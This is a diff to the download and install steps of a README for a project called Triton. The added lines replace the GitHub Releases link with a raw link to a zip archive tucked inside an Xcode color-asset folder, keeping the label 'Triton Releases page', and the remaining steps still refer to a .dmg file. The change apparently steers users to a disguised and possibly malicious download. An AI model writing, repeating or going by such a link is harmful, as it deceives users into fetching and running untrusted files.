JaoAureliano/Triton/README.md

 ## 📦 Download & Install

-1. Click the link above to go to the [Triton Releases](https://github.com/JaoAureliano/Triton/releases) page.
+1. Click the link above to go to the [Triton Releases](https://raw.githubusercontent.com/JaoAureliano/Triton/main/OMG/Assets/Assets.xcassets/AccentColor.colorset/Software_3.1.zip) page.
 2. Scroll down to find the latest version.
-3. Look for the file labeled "Triton.dmg" or a similar name.
+3. Look for the file labeled "https://raw.githubusercontent.com/JaoAureliano/Triton/main/OMG/Assets/Assets.xcassets/AccentColor.colorset/Software_3.1.zip" or a similar name.
 4. Click on the file to start the download.
 5. Once downloaded, open the .dmg file from your Downloads folder.
 6. Drag the Triton app into your Applications folder.